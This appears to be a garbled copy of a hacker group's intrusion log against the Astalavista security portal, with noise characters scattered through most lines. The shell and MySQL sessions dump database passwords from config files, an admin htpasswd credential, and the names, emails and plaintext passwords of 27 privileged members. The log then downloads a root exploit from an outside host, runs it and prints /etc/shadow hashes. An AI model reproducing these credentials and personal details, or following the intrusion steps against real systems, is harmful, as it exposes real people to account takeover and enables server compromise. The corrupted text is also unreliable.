: W" e) B) Y$ C8 idrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner, i( S5 E" R* Y1 C0 z, \ B
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
6 E" C6 \' {4 {/ D& I8 ?drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
/ i# v& i, C6 |drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
+ Z5 s$ i- a3 h! S; bdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
. e: G+ U2 w. s2 {) |7 H+ b-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
) ~9 c! ^) `5 _ j, J# n-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
/ n2 z) d4 A: w; E9 E7 gdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
! U% D6 @* R( q5 W F& [/ l; Vdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour) U. P h9 u9 E
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess# l1 U* i& X1 R0 ~2 N& r) [# u
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
' C7 |3 B( w% p9 t2 f* x' `/ v-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
* I! Z0 a4 E) t$ u+ ~" E j-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
9 @ ?$ R4 s3 f. l5 s$ y o-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
9 ^# |; ~; e0 b6 M3 g-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php' x! m" g" o1 w5 \
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf6 }5 X- N! {. e' Z, J
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
/ g" O) h: _4 f& Qdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang- L( z0 |0 ^/ L; B k7 K0 m; _
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
5 Z- J3 h" I+ Y# n. x2 X. zdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log- h- N ~# _' ?" S" F) W8 G# G
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member/ t ^, n3 ~ s1 ^0 S* ^) J8 C
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata) W! D4 j" K6 U# n+ Q% Y6 E
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
9 l* l: c# u' X, D. n+ a-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf A4 f m7 E' }
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
} w. C2 c2 u! H8 s-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
0 I7 x* [& F8 M4 w6 K: ydrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss% |6 m2 g) K) h" ~6 p
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources4 \, \0 |3 B. f7 d- J" c5 b
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com& [7 G: J/ ]3 W! j+ q1 F n# n# s
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes9 p4 R5 H8 O5 W: g
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src6 R9 T2 n5 j# m; C6 P" v* n# Y- z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl. ]" J# V( O8 ?; y& ^! N3 D
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2" x/ g6 C( s" p/ c- j
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old/ p w I! `9 a( ]
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php, r: ?( `4 s. X, u- G4 Z
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
7 }- C9 k# c) j' g! `6 L- M1 t6 ]3 j3 c
. N* i3 D1 ^( P7 ~; m k t; nsh-3.2$ head -20 index.php
2 A- L+ N; ]) v<?PHP
1 P! l6 N- u; Q* Q8 u5 t/**
1 L& O$ ~ s3 g* Mainfile (external) for astalavistaNET v2.0
) L. \( ~! i0 I! K*
# z x- G* ~! ?( V$ ^* @copyright Astalavista IT Engineering GmbH) p2 ]) _% s! N5 o: a* m9 y2 g
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>" \; [5 \' M7 r' `
* @version 1.09 ]! O* B/ I5 N) W* ^5 m
*/
; c: O+ P3 J& A; Y8 N% `6 G9 {- W* X4 w
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {% i+ S2 }) s( K% \; {1 F8 r
$dontStartSession = false;
, K* I* F c: V3 N6 l1 j# L } else {
3 f5 x' }6 x% X' F $dontStartSession = true;
# K2 l- Q0 a4 c1 C9 d Z }
! ]6 w c! S7 n) ~0 _ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
+ `2 J' k: ?8 ]9 A require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);, { p5 F; G' d5 v+ X: _, _: B# Q
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
! M3 Q% G2 f) ?8 Y9 P5 h& m require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);0 E* g t0 n: Z* l; h
4 B% I( A: `* B6 k" b* W" r
sh-3.2$ cd config
5 Y2 V e! a7 t6 xsh-3.2$ ls -la
! [5 x1 X4 v$ q- Ototal 32
7 [, b# E) w8 G8 `" y: S, Mdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 ., x4 [$ R: W- l0 G) `* }1 @
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ N; A: P3 g! N. J, x
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php& X3 |4 l& B3 F& _" A( J
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php/ D$ e: X# \ R% M
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
6 _1 f$ k4 D, f. Q- d-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
, V( b5 k8 {0 K0 Z7 t4 X5 u-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
. k' @1 C+ N2 M% `% c! |; t% s& |& B1 N! F0 e l
sh-3.2$ cat com.conf.php1 t8 L. O, R3 e7 d) B9 E
[snip]3 O' _) `+ e E
//member-database
6 D/ A2 U1 S7 \4 G$_CONFIG['db_mem_server'] = ‘localhost’;0 Q! k5 L: v4 `
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;* I. L3 [& G6 m- B9 i c
$_CONFIG['db_mem_user'] = ‘astanet_db’;
' A. }, _0 A4 V9 v$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
& T) \% l% c' z6 V& B# }$_CONFIG['db_mem_debug'] = false; //true or false
" Q9 Y3 a7 X8 E& h( c/ N/ X//ads-database8 I4 ], D7 F T& w
$_CONFIG['db_ads_server'] = ‘localhost’;) i& a& e, P7 @8 q% X
$_CONFIG['db_ads_database'] = ‘astanet_ads’;6 j$ |: w5 R- D) X' H
$_CONFIG['db_ads_user'] = ‘astanet_db’;
6 r8 g1 _7 t- g7 q- j: T- W5 I$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
# E H1 r; ]9 g9 M6 P' V0 i$_CONFIG['db_ads_debug'] = false; //true or false
- u2 J- r0 v7 \4 s//rainbow-database& o3 _. P# i7 C( P& F, a. _( J8 e
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
- E, |- ?3 p- W* v/ D- Z. r$_CONFIG['db_rainbow_database'] = ‘rainbow’;' q/ r4 h3 V- F6 \. Z3 F
$_CONFIG['db_rainbow_user'] = ‘dinu’;
) t1 {+ O- {5 k x0 g$_CONFIG['db_rainbow_password'] = ‘dinudinu’;$ j! Q5 G5 K, s2 n- x+ z8 O
$_CONFIG['db_rainbow_debug'] = false; //true or false% [3 r# f' d/ z3 |9 k
//mailing lists database
. |, A8 M* H/ m/ r% P# i( `2 l. A$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
2 A! R% g0 L/ i$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;/ F4 R. e# f0 @( O
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;2 l; q% r; s3 w6 W' \: Y; `2 d3 T
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
! q& X3 O) f- M# g( w$_CONFIG['db_mailing_lists_debug'] = false; //true or false! l W% ]4 {5 N4 O$ v
//paypal2 A" k1 a1 @ }1 _9 O
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
' @8 `+ S; a! O3 ~- Y* Y" t$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
( F: L* B5 X, L5 Q* {$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;1 _% B' D3 z$ T M) w3 V; ?
$_CONFIG['sub_pp_noship'] = ‘1′;( C; w& I* w' v/ E5 C
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
! L/ b8 M$ j1 o- i5 A p[snip]
8 n2 p3 H- [% z1 ~: O4 ]* A# ^; U# X' v$ _, z2 \
sh-3.2$ cd ... {( k* h) m7 \: e9 V; ]
sh-3.2$ cd member
. w% j+ N' ]5 u/ E- Ash-3.2$ ls -la0 s2 t5 t4 e# b5 t( G$ ^, v0 O
total 20
% a7 H' P1 {3 M7 Z2 o% Q$ pdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
/ W, E* d" l8 K, t) sdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..: [2 j4 ?7 I. G# Z t8 _- Z( Z+ C
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess) q# f% {7 z) z: t
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& A7 i5 M2 m8 D; w( k1 T
sh-3.2$ cat .htaccess5 H, ~" ?# ^; I4 { v
SecFilterEngine off x, S% c7 j! c. ]3 F
* |' ?0 `: ?6 b* k: I9 q0 f
sh-3.2$ cd ..
: c9 Z" N, Y5 t. Xsh-3.2$ cd cron) l; M4 q8 m! h3 f5 ^* \# O
sh-3.2$ ls -la, L% ]0 y( o/ F$ }) S
total 168
7 _6 S& ^4 [0 f/ s8 k) hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .) O, w% h# {6 \$ T
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
8 F( \8 B. V2 q* F2 w7 U-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
0 a; _# Y! L& t- h a9 Q. g-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
0 m# E+ X9 S6 S( Q7 ?. q: T-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php2 S, ]9 w0 _9 c+ E
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php/ f+ _: B% w2 J8 Z' V3 L
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
2 Z: a: x7 w# ?1 V4 O-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
7 L0 J5 N) ^" b! t* ?-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php3 y/ C2 w; c$ j3 P" H4 I+ e. K
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php) Z) r( H9 }3 y( w1 p3 }
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh# k3 \. h5 c4 T' \
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 W4 g4 @5 a/ Y. h7 f/ [3 {. v; L
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php" p1 @! m$ {( e2 G$ ~2 M1 c6 |
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
, B* U3 \% \# J6 p8 @-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh- }* l. y( e% D: W( A
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php* z# g8 w" g* I( h' s
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php' n3 J' W8 \& E9 q
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php5 F3 }* _6 J! ?; ?+ }, L
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
' A5 H+ f6 A4 `$ Q-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
: a* L6 Z) t1 @* E$ M. P! Vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
* J/ d" F n9 S3 B-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php; K; v6 R8 b' \
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
# ?2 J; b$ c5 M5 O' m3 N' Y6 V6 D1 H& O' Y1 y& X
sh-3.2$ cd ..
$ ]2 W- b) {5 X5 ~: jsh-3.2$ cd _007
/ O- n; N# C. s; b# msh-3.2$ ls -la2 p" F. E9 S) T( }$ |
total 24
( E: X8 h% t- z* u5 h s+ w/ J& xdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
( {( J8 X. E4 k- fdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, Y$ _$ x" _. Z9 c7 x4 o9 q9 p* }-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess1 l* S9 l1 L/ ^
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php8 C3 s$ G4 G+ E# s4 F( R, ^3 `! _
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php$ x% N7 K+ [& c" g
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
R. ~7 V `- C, i5 E7 V) {$ o# j3 g1 d1 L. i
sh-3.2$ cat .htaccess& @/ P" v6 ^* L0 l C, Y
authType Basic
( N$ g4 K: E4 X; ?* }authName Admin
- B) A9 U1 o4 A/ m: i; d! X1 vauthUserFile /home/astanet/auth/.htadm_pwd% R4 l- j& i/ {
require valid-user
' E9 s. [7 G7 s' u% s9 G+ Z( }9 h, u5 _5 P5 {+ ~, s
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
' S- h( q: z9 b9 {* badmin2net:CR0bl65MwhfT
' E. B) U8 L; f6 u+ m2 j
9 U3 L+ q. Z% g7 G( _sh-3.2$ mysql -u astanet_db -p
$ x" H" E" s, w# I" ~Enter password:) x9 q2 _; E* }* Q& W0 X
Welcome to the MySQL monitor. Commands end with ; or \g.5 D# f* ?5 t% r$ R/ x
Your MySQL connection id is 275153! c! G( s/ Y! I* W; o
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 D7 n9 H* |: L
9 t- c& h; { @' e. I$ Z/ [; QType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# B8 d+ b+ T: S- O/ F* y
$ ~) @- v- U/ d* emysql> show databases;
% w+ W* w% b. T2 v) v, f+———————–+# q7 |" p# a2 q n' k
| Database |! O3 H y" n6 g% ?2 M
+———————–+
$ b Y9 {0 |: r| information_schema |
/ P. i W5 l/ \ S| astanet_ads |! S) D8 \0 r; Q3 T* e' Z0 L
| astanet_mailing_lists |
( r9 E6 m D4 `* c| astanet_mediawiki |, H V- x) v% d5 u R3 f7 N9 y+ l
| astanet_membersystem |
2 Z' }3 n# i0 d0 M| test |) M( I T7 b+ N& R& B& x4 C' m X) X( h
+———————–+
0 w9 w, b5 N, B" j- G- z# P6 rows in set (0.00 sec); D0 W5 N5 z) a4 h$ ~
$ c+ L. D M* S7 f: b
mysql> use astanet_membersystem
+ @- X* b! [2 @Database changed
; I7 I- U' t% Smysql> show tables;
& t. g% P; Z; d7 S( ]5 B+———————————–+
% f' K4 X( I9 Q4 @) x| Tables_in_astanet_membersystem |
' [: Z1 D+ r1 S4 }3 h% Z- N2 n0 v+———————————–+( u7 ^9 T9 }0 ]4 `
| blacklist_categories |
, E$ T7 s# k- D) ]5 a; t| blacklist_content |
5 U3 p) |; W( d' g; B& E) x8 |9 p| blacklist_levels |, V# H' x3 t0 K4 p0 T/ |! y
| blacklist_mcset |
* ` ]* C" ^1 ?& l9 ^* {- {" b. _| dir_categories |; i; @! w% v- M: A) Z
| dir_comments |8 H2 w, d5 D: {# S
| dir_links |5 i0 _7 I! J+ |+ I6 |, n
| dir_temp |: e6 j( @4 c' [' T
| dir_votes |! `: _) G5 Z' e
| documents |3 O" t! y# [2 a1 u6 }
| documents_categories |4 E0 ?" x( ^: w5 K$ ~$ t1 v
| email_content |* Y4 \9 {! `0 N6 K9 a6 \
| email_settings |; X; b& \& d3 T- Q1 j' o4 M5 a
| exploits |
; C$ G( z( I" I1 |$ A| exploits_categories |6 w" v% |( [1 N$ M, C8 l
| exploittree_categories |
, L. @ ~7 _# W' B. r: n0 r| exploittree_exploits |6 Y; q3 g$ a; g) P" _' z9 \) h
| home_values |4 X. [" Q1 K6 _; _' Z' W D
| iso_countries |
( `! R9 H# ~ _| links_categories |4 o$ P) I# R! o% @
| links_records |$ i7 q* X! }9 E1 G
| links_unauth |* ^& w2 \6 t& `
| links_votes |( U& s- F" [% E
| log |2 ?# @: R' U4 G# y. M6 \
| news_categories |8 H* U s% L5 o( b5 a8 g
| news_comments |
3 R) q4 i5 ?9 t0 ?% B' z7 c| news_emoticons |% k; W5 Q& a0 C5 I- K- W" T
| news_latest |
- B7 e% Z( D' A7 o& V* w| news_messages |" P! W6 t2 u! ?, k! M
| news_statistics |
- d0 u* O* g& e, l* r7 i6 A% v| news_votes |
) y# V3 v) I. K9 ?3 Y; a8 Z+ h| prices_content |
/ O8 P# W! t( p2 ^| prices_offers |
% s. i# Z( ^# V" p; X. h| rss_settings |
3 G" K, V; m* h. {: ~| sessions |; } D# V- C; @- a% c
| stats_signups |
! B8 Y% G/ d3 r6 G, {% g. Q- ~| u2u2 |2 q! s2 S9 x% g5 A4 O" K; z
| u2u_contact |0 H+ w& J# f& [0 v/ k$ B& u" k, W
| u2u_settings |2 @! W) b1 A" [
| user_keywords_selected_categories |
$ M; f4 Q' @% p$ T9 x" p| users |5 y" w. ?7 j$ l7 e/ X# A
| users_ipn_test |
! b1 p. V8 z6 C2 p5 o9 ^- _& || users_keyword_values |% _4 ^: g1 g4 r, J: r7 s; ~+ h
| users_profile |; P9 R4 x4 J8 H7 y5 ^1 q1 ] F
| users_temp |
! n: [6 g; U( k- B+ ~1 z| users_upgrade |: |; h5 d0 W' U" O
+———————————–+
6 |7 }* f. d% ?& D6 |46 rows in set (0.00 sec)
+ V9 J4 h! A1 m' \
% ^) D/ k3 \, o9 cmysql> describe users;0 P: o: z+ @' Q+ M& U+ \( d6 U* J0 f
+————————–+————————————–+——+—–+———————+—————-+
0 S# a% R- e$ ~4 s; l( D) x, G1 N| Field | Type | Null | Key | Default | Extra |6 D$ i2 [+ b) @; S. E7 {
+————————–+————————————–+——+—–+———————+—————-+
) o! O/ o" ^( k. E+ G, _| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
( V& T" V) U; r: Q* w| user | varchar(50) | NO | | | |7 p* \& E8 Q+ d' [& I7 m. N6 O' a7 _
| nickname | varchar(30) | NO | MUL | anonymous | |
$ g# l5 l, F3 j R. }| password | varchar(30) | NO | | | |3 J% S I6 i. {( \0 Q# p; i4 Q( m
| userlevel | tinyint(3) | YES | MUL | NULL | |
- Z! U) B7 g s/ b+ H| exp | int(8) unsigned | NO | | 0 | |
9 w s7 }) { x' S7 g# x| email | varchar(50) | NO | | | |
. t% X, S5 O& Q: R| ip | varchar(15) | NO | | 0 | |2 [/ `4 q+ V! @2 b1 v6 Q2 z. i6 I/ }
| proxy | set(’0′,’1′) | NO | | 0 | |
* w& w+ v6 H1 _ S- Y5 @| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |5 l/ s. U5 I) J/ S5 I
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |4 g U& @1 F( _5 M5 C
| anz_in | tinyint(1) | NO | | -1 | |
6 V( V) s+ Y. d3 [. l( B| status | tinyint(1) unsigned | NO | | 0 | |
* R$ C! Z6 b: v/ G| checked | set(’0′,’1′,’2′) | NO | | 0 | |
0 {2 d8 u4 x: f+ y: F| freemember | set(’0′,’1′) | NO | | 0 | |4 [- E+ H8 g. l# {
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
: t2 Z7 q q+ w% j| lang | tinytext | NO | | | |$ }: e' _* a2 k5 X' i7 K
| adid | smallint(6) | NO | | 0 | |# O; D" F9 f( }5 i/ A
| pp_txn_id | varchar(255) | YES | | NULL | |
1 f- ?2 q* \: a$ w| cnb_transaction_id | varchar(255) | YES | | NULL | |
- R4 W. L: H: u: ?| cnb_order_id | varchar(255) | YES | | NULL | |
]* Z7 h1 V# y, S5 W* B| cnb_user_id | int(11) | YES | | 0 | |
$ S, u: h/ Z1 h R% j+————————–+————————————–+——+—–+———————+—————-+
: T/ C, o+ g% N+ p22 rows in set (0.01 sec)
) a/ v1 {" A1 s' B, `4 r; q# t i, o
mysql> select count(*) as skids from users;
# w+ n( x' \1 T/ `, C- I+——-+
2 o3 B9 F% E3 X& Y* g| skids |
) g5 t3 O6 ?' {1 X+——-+; l" v' n" E& g) h# U: w0 n, p
| 25199 |
/ J( w4 X+ P: o3 L+——-+
- s" p u- j; A4 S3 v1 row in set (0.00 sec)
; N; |1 Q6 Y# F3 y# y X+ v9 K* _% O, Z9 a
mysql> select user,nickname,password,email from users where userlevel = 1;* d- i: j% R% \6 Z% x" M& i
+————————–+———————-+——————+———————————–+# ~! Q- K" x. D9 Y( Y4 L
| user | nickname | password | email | G3 A. A# [+ z( Y2 }
+————————–+———————-+——————+———————————–+2 b$ k H W, A" K8 y1 S ^! W
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
( f$ V- o, w( J. |' S2 |7 M| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |5 u/ P$ h7 b3 S
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
1 w& f: \, G' h( m) f) X* U| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |7 h4 }9 f3 k/ P3 ?3 x
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |6 V/ t7 J9 X+ ]( f! E, y1 R; Z
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |9 Q8 k" N+ J% c. r3 G6 l2 z
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |4 Z1 H1 u) E' p4 q$ o B
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
$ B% N% {/ l$ Q| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |6 t1 C/ V$ { i6 T% K9 V" j
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
5 A) q5 [8 g' v9 N2 B# c1 D1 Z7 e| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |9 d3 i: l. ^4 x
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
m8 H) a" g* A4 [4 {| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
* N q+ N( V% i0 U* v+ M' `9 D% Z% o| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |' {0 U3 w$ H2 }, @" q; {
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |1 x- D2 B# O- r% s0 R$ _
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
" P5 F3 {; k" K, c5 F0 _7 b8 f| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |2 `7 _) C0 e3 |- J
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
4 p; a5 z2 \" m& || Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
) x- I, G6 ~+ {- u5 @| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
! q' a$ X$ k0 }| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
0 M+ n3 c5 X# S9 m/ R3 h| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |3 F! s! C& \& j6 O8 ^0 x6 ^* Q
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |8 c4 J- p- ~ q
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |4 L6 I1 @: w/ \/ X, F
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
9 U2 X) `& s- c# [$ J| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
% P( H- c9 w) D+ G5 e. X2 O| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
: [# G" t2 W Q$ [# }& ^+————————–+———————-+——————+———————————–+2 b# c% P6 B; \7 c! }& v
27 rows in set (0.00 sec)
9 t& r7 }# O* p" Q0 I+ N! ~+ K
. f I+ i% c) \% @7 {mysql> exit;
9 Q' v) F6 C$ O2 S# ]0 T" X) YBye
$ j( l% U& X6 B. t3 s P1 R o" v8 j, d3 t$ J
[~] plaintext passwords? yes,
2 |- h5 l# m6 Q; ~1 v) nThose so called “security professionals” who charge you $6.66 / month to2 o, N, f; P& f, R9 I; Z
register at their hack-proof portal, save your passwords in plaintext…
2 S u, c T6 M2 \2 {$ ~* Gbrilliant!, T' ]+ ? A1 q1 R n4 _
+ j9 U: `+ [$ H% D[~] This been fun but we want more.+ r+ P% H' J% e4 b: |( w+ |
& W$ c: u& e) @sh-3.2$ uname -a
! c+ K; h% i: G7 J9 GLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. D- n3 ~( V% G
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]" H% R6 d1 Q* `
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
0 x; x- f2 H3 ^1 ~/ `$ [6 aResolving anti.sec.labs… 13.33.33.37
' k1 i9 i# J- g/ H) CConnecting to anti.sec.labs|13.33.33.37|:80… connected.0 T, e% W8 ^9 d( Y6 ~
HTTP request sent, awaiting response… 200 OK0 v( v% {+ A& P) B! C
Length: 18200 (18K) [text/plain]
. X) K( Z8 N6 D. }3 G; V SSaving to: `g0troot’8 N. I& @( Z. b
6 Y, w5 ~, B1 C# \% ^100%[=========================================================================================================================================>] 18,200 58.6K/s in9 g( G( I. r$ a+ m# x' C: z+ m
0.3s
, E+ z2 d' q3 ^ w, c( b7 \" T4 A0 V7 r% _0 ]4 N
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]/ t! @ c8 Q9 V
9 p7 l$ _2 o3 y csh-3.2$ ./g0troot -i x86_64
5 c4 x e. N8 j6 D3 h: W6 E[+] g0troot - anti.sec.labs0 K3 p2 {9 Z1 {+ m2 o0 o; D) a' |+ \
[+] Target: 2.6.18-128.1.10.el58 p% H9 G* q9 e8 ~4 I
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
( M- _! q" V+ |9 {( z3 L. Z) b
* y( P8 T. c2 T7 r ]% f[+] r00tr00t- S6 k0 x, i, w1 X& d+ e; W6 l
[~] Executing shell…; b: i! L' z' P1 j- K6 h
1 K* L! ~. P, [9 [+ I- Vsh-3.2# id
3 f" x( _8 }6 S5 u$ r; F0 Muid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)3 r( C7 k7 h" x# l$ Z# g
$ e/ E* Y1 \2 I: ^9 u# i
sh-3.2# cat /etc/shadow1 g6 z' Q; u' @0 m) T7 I
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::" p# p5 R( [5 U' C. p5 U1 K
[snip]- l0 M! A# h0 E8 `7 a" f
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
, O0 J6 ^* l, h. d" S; i9 D8 _jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
P% \9 D- p& F3 p7 zcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
7 L4 f: K0 M- B& q- c8 \9 lastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::! Y/ N" Z, K' C4 p. O, h
. N/ I& F3 r, e( T: e, j& Nsh-3.2# cat /etc/motd% [$ |( @$ b3 B0 c/ A+ S
###################################################### q+ N0 ~6 P# O! T' F# k8 o
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
9 K: [$ W! P2 f7 ?9 Y; G4 g0 ^# |__| [__ | |__| | |__| | | | [__ | |__| #
7 A& @4 l& V7 U1 Q# | | ___] | | | |___ | | \/ | ___] | | | #
' C2 q9 a: m/ \# #3 J" j0 c' S8 V; B! J
#####################################################( E2 R* d& \: [. h7 E
